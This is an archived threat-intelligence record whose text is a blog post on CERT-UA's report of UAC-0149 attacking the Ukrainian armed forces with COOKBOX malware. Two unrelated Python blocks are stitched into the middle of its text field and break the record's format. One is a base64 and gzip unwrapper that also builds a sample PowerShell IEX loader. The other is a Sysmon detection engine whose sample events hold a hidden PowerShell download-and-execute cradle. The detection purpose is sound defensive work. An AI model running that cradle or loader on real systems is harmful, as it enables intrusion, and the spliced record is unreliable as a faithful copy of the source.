{
	"id": "193818d5-1b2b-4ecc-96b3-048f5c083108",
	"created_at": "2026-04-06T00:14:35.879723Z",
	"updated_at": "2026-04-10T03:27:56.169825Z",
	"deleted_at": null,
	"sha1_hash": "d96b698de97bc90cd95474fab0f22d0c673bab1d",
	"title": "UAC-0149 Attack Detection: Hackers Launch a Targeted Attack Against the Armed Forces of Ukraine, as CERT-UA Reports",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 242545,
	"plain_text": "UAC-0149 Attack Detection: Hackers Launch a Targeted Attack\r\nAgainst the Armed Forces of Ukraine, as CERT-UA Reports\r\nBy Veronika Zahorulko\r\nPublished: 2024-02-26 · Archived: 2026-04-02 12:22:29 UTC\r\nTwo days before the 2nd anniversary of russia’s full-scale invasion, CERT-UA researchers uncovered an ongoing phishing attack against the Armed Forces of Ukraine. The campaign, attributed to the UAC-0149 group, has leveraged COOKBOX malware to infect targeted systems.\r\nUAC-0149 Attack Analysis Using COOKBOX Malware\r\nCERT-UA, in coordination with the Cybersecurity Center of the Information and Telecommunication Systems of Military Unit А0334, unveiled a targeted attack against the Armed Forces of Ukraine, covered in the corresponding CERT-UA#9204 alert. The UAC-0149 group has been running this operation since at least fall 2023.\r\nOn February 22, 2024, several military employees received, via the Signal messenger, a lure macro-enabled Excel workbook titled “1_ф_5.39-2024.xlsm” related to reporting issues. In addition to a legitimate macro, the file contained VBA code that executed a PowerShell command responsible for downloading, decoding, and executing the PowerShell script “mob2002.data.”\r\nThe PowerShell script, downloaded from GitHub, modifies the operating system (OS) registry: it writes the primary payload in base64-encoded form and a base64-encoded decoder-launcher to the “HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\XboxCache” branch, and creates an autostart entry named “xbox” in the “Run” branch that executes the decoder, which in turn decodes and runs the primary payload. The decoded payload is another PowerShell script that performs GZIP decompression and executes the malicious COOKBOX program.\r\nCOOKBOX malware is a PowerShell script for loading and running PowerShell commands.
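The staging chain described above (a base64-encoded loader behind the Run entry, a base64-encoded primary payload under XboxCache, and a GZIP-compressed script inside it) is the kind of thing an analyst has to unwrap from a registry export. The following Python is an added example, not CERT-UA's or SOC Prime's code and not the real payload: it builds a constructed stand-in for such a registry value and then peels the layers generically, base64 first, gunzip whenever the 1f 8b magic appears, and the next embedded base64 run after that. All function and variable names are mine.

```python
import base64
import gzip
import re

# Long base64 runs embedded in a decoded script (e.g. the argument of
# FromBase64String). 40 chars is an arbitrary floor to skip identifiers.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')


def build_sample_registry_value(inner_script: str) -> str:
    '''Constructed stand-in for the primary-payload value, mirroring the chain
    the article describes: the inner script is gzip-compressed and base64-encoded,
    wrapped in a PowerShell loader that decompresses it, and the whole loader is
    base64-encoded again. Not the real UAC-0149 payload.'''
    gz_b64 = base64.b64encode(gzip.compress(inner_script.encode())).decode()
    loader = ("$d = [Convert]::FromBase64String('" + gz_b64 + "');"
              "$s = New-Object IO.MemoryStream(,$d);"
              "$g = New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress);"
              "IEX (New-Object IO.StreamReader($g)).ReadToEnd()")
    return base64.b64encode(loader.encode()).decode()


def looks_like_text(data: bytes) -> bool:
    '''Printable ASCII plus whitespace means we have reached a script layer.'''
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def unwrap(blob: str, max_depth: int = 8) -> list:
    '''Return every layer recovered from a base64 registry value, outermost first.
    Each step: base64-decode, gunzip if the gzip magic (1f 8b) is present, then
    look for a further embedded base64 run inside the decoded script and recurse.
    max_depth bounds the loop so a self-referencing blob cannot spin forever.'''
    layers = []
    current = blob
    for _ in range(max_depth):
        raw = base64.b64decode(current, validate=True)
        if raw.startswith(bytes([0x1f, 0x8b])):
            raw = gzip.decompress(raw)
        if not looks_like_text(raw):
            layers.append(raw)          # binary layer we cannot read as a script
            break
        text = raw.decode()
        layers.append(text)
        nxt = max(B64_RE.findall(text), key=len, default=None)
        if nxt is None:
            break                       # innermost script reached
        current = nxt
    return layers


def recover_final_script(blob: str) -> str:
    '''The innermost readable layer, i.e. the script that would actually run.'''
    last = unwrap(blob)[-1]
    return last if isinstance(last, str) else ''


if __name__ == '__main__':
    sample = build_sample_registry_value('Write-Host "constructed inner script"')
    for i, layer in enumerate(unwrap(sample)):
        print(f'layer {i}: {str(layer)[:70]}')
```

The same loop handles the other direction of the chain too: feeding it the base64 decoder-launcher value instead of the primary payload simply yields a loader text whose embedded blob points at the next layer. If a layer decodes to non-printable bytes that are not gzip, it is returned as raw bytes so nothing is silently dropped.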
For each infected device, a unique identifier is computed with cryptographic hash functions (SHA256/MD5) over a combination of the computer name and the disk serial number. This identifier is transmitted in the “X-Cookie” header of HTTP requests to the C2 server.\r\nCOOKBOX persists via a corresponding entry in the “Run” branch of the OS registry. That entry is created during the initial infection stage by a separate PowerShell script, the COOKBOX deployer. The code commonly relies on obfuscation such as character encoding, character substitution (replace()), base64 encoding, and GZIP compression. UAC-0149 uses dynamic DNS services and Cloudflare Workers to manage its C2 infrastructure.\r\nDefenders observed that the adversaries succeeded in infecting targeted systems with COOKBOX only where the infrastructure was not properly protected. Devices that did not block attempts to run cmd.exe, powershell.exe, mshta.exe, wscript.exe/cscript.exe, hh.exe, and similar script hosts and command-line utilities were the most exposed, and the likelihood of compromise was higher where such utilities could be launched from a process parented by a Microsoft Office application (e.g., EXCEL.EXE). Notably, in one case the adversary's attempts failed because EDR protection was properly configured, which underscores the need to follow cybersecurity best practices and strengthen cyber defenses to withstand such attacks.\r\nWith the rise in cyber attacks targeting Ukraine and its allies, mainly in the public sector, forward-looking organizations are striving to elevate cyber vigilance backed by a proactive cyber defense strategy and innovation capabilities.
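The two observations above, script hosts spawned from an Office parent and the registry writes that give COOKBOX persistence, translate directly into detection logic. The following Python is an added example, not a SOC Prime rule and not CERT-UA code: it runs three checks over constructed Sysmon-style events (field names follow Sysmon's EventID 1 process-creation and EventID 13 registry-value events). The event contents, the sample command line, and the Office and script-host lists, which I extended beyond the article's EXCEL.EXE example to other Office binaries and pwsh.exe, are my assumptions.

```python
import ntpath

# Script hosts and shells the article names as abused, plus pwsh.exe (my addition).
SCRIPT_HOSTS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe',
                'wscript.exe', 'cscript.exe', 'hh.exe'}
# The article cites EXCEL.EXE; the other Office parents are an assumed extension.
OFFICE_APPS = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe'}
# Persistence locations named in the article: the XboxCache storage branch and
# an autostart entry called xbox under the per-user Run key (compared lower-cased).
RUN_KEY = 'software\\microsoft\\windows\\currentversion\\run\\xbox'
STAGING_KEY = 'software\\microsoft\\xboxcache'


def image_name(path: str) -> str:
    '''Lower-cased file name of a Windows image path (ntpath handles backslashes).'''
    return ntpath.basename(path).lower()


def office_spawned_script_host(ev: dict) -> bool:
    '''EventID 1: a script host or shell whose parent is an Office application.'''
    return (ev.get('EventID') == 1
            and image_name(ev.get('Image', '')) in SCRIPT_HOSTS
            and image_name(ev.get('ParentImage', '')) in OFFICE_APPS)


def download_cradle(ev: dict) -> bool:
    '''EventID 1: a PowerShell command line that both fetches a remote stage and
    decodes it (the VBA-launched download/decode/execute step in the article).'''
    if ev.get('EventID') != 1 or image_name(ev.get('Image', '')) not in {'powershell.exe', 'pwsh.exe'}:
        return False
    cl = ev.get('CommandLine', '').lower()
    fetch = any(k in cl for k in ('downloadstring', 'invoke-webrequest', 'iwr ', 'net.webclient'))
    decode = any(k in cl for k in ('frombase64string', '-enc', '-e '))
    return fetch and decode


def cookbox_persistence(ev: dict) -> bool:
    '''EventID 13 (registry value set): a write to the xbox entry under the Run key
    or anywhere in the XboxCache branch, whatever the hive prefix (HKU plus SID, or HKCU).'''
    target = ev.get('TargetObject', '').lower()
    return ev.get('EventID') == 13 and (target.endswith(RUN_KEY) or STAGING_KEY in target)


RULES = [
    ('office_spawns_script_host', office_spawned_script_host),
    ('powershell_download_cradle', download_cradle),
    ('cookbox_registry_persistence', cookbox_persistence),
]


def evaluate(events) -> list:
    '''Return (rule_name, event) pairs for every event that matches a rule.'''
    return [(name, ev) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample telemetry (not real logs): one Excel -> PowerShell chain with
# a download cradle and the two registry writes, plus benign noise that must not fire.
SAMPLE_EVENTS = [
    {'EventID': 1, 'Image': 'C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE',
     'ParentImage': 'C:\\Windows\\explorer.exe', 'CommandLine': 'EXCEL.EXE 1_ф_5.39-2024.xlsm'},
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'ParentImage': 'C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE',
     'CommandLine': 'powershell -w hidden -c "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($u))))"'},
    {'EventID': 13, 'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'TargetObject': 'HKU\\S-1-5-21-1111-2222-3333-1001\\SOFTWARE\\Microsoft\\XboxCache\\p'},
    {'EventID': 13, 'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'TargetObject': 'HKU\\S-1-5-21-1111-2222-3333-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\xbox'},
    # benign: a console opened from Explorer, and an unrelated app writing a different Xbox-named key
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\cmd.exe',
     'ParentImage': 'C:\\Windows\\explorer.exe', 'CommandLine': 'cmd.exe'},
    {'EventID': 13, 'Image': 'C:\\Program Files\\SomeVendor\\SomeApp.exe',
     'TargetObject': 'HKCU\\SOFTWARE\\Microsoft\\XboxLive\\Token'},
]

if __name__ == '__main__':
    for name, ev in evaluate(SAMPLE_EVENTS):
        print(name, '->', ev.get('Image'))
```

The parent-process check is deliberately independent of the command line, because it is the condition the article reports as decisive on unprotected hosts; the cradle heuristic is a noisier second signal, and the registry check matches on the key suffix so that HKU-with-SID and HKCU spellings of the same path both fire.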
Leveraging Attack Detective, organizations can identify blind spots in detection coverage, gain automated threat hunting capabilities, and minimize the risks of organization-specific threats to reinforce their cybersecurity posture.\r\nDetect the UAC-0149 Attack Covered in the CERT-UA#9204 Alert\r\nSecurity experts estimate that around 40 russia-backed APT groups attacked Ukraine in H1 2023, with intrusions constantly growing in number and sophistication. This time, the Armed Forces of Ukraine became the target of another malicious campaign by UAC-0149 relying on COOKBOX malware.\r\nTo help security professionals spot suspicious activity linked to UAC-0149 and COOKBOX, the SOC Prime Platform for collective cyber defense aggregates a set of behavior-based detection algorithms accompanied by detailed metadata. All the rules are mapped to MITRE ATT\u0026CK® v14.1 and compatible with 28 SIEM, EDR, XDR and Data Lake solutions. Just hit the Explore Detections button below and drill down to the curated rule set.\r\nAlternatively, cyber defenders can search for related detections using the “UAC-0149” and “CERT-UA#9204” tags, based on the group identifier and the CERT-UA alert.\r\nSecurity engineers can also streamline IOC packaging with the Uncoder AI tool: paste the IOCs provided by CERT-UA and automatically convert them into performance-optimized queries ready to run in the chosen environment for smooth threat investigation.\r\nMITRE ATT\u0026CK Context\r\nSecurity engineers can also check out the details of the UAC-0149 attack using COOKBOX malware provided in the most recent CERT-UA alert.
Explore the table below to access a comprehensive list of adversary TTPs linked to the relevant Sigma rules, facilitating a thorough analysis:\r\nSource: https://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/"
	],
	"report_names": [
		"uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports"
	],
	"threat_actors": [
		{
			"id": "a1c739f9-e0b5-4a58-a720-1d88b318641b",
			"created_at": "2024-04-23T02:00:04.251052Z",
			"updated_at": "2026-04-10T02:00:03.633106Z",
			"deleted_at": null,
			"main_name": "UAC-0149",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0149",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434475,
	"ts_updated_at": 1775791676,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d96b698de97bc90cd95474fab0f22d0c673bab1d.pdf",
		"text": "https://archive.orkl.eu/d96b698de97bc90cd95474fab0f22d0c673bab1d.txt",
		"img": "https://archive.orkl.eu/d96b698de97bc90cd95474fab0f22d0c673bab1d.jpg"
	}
}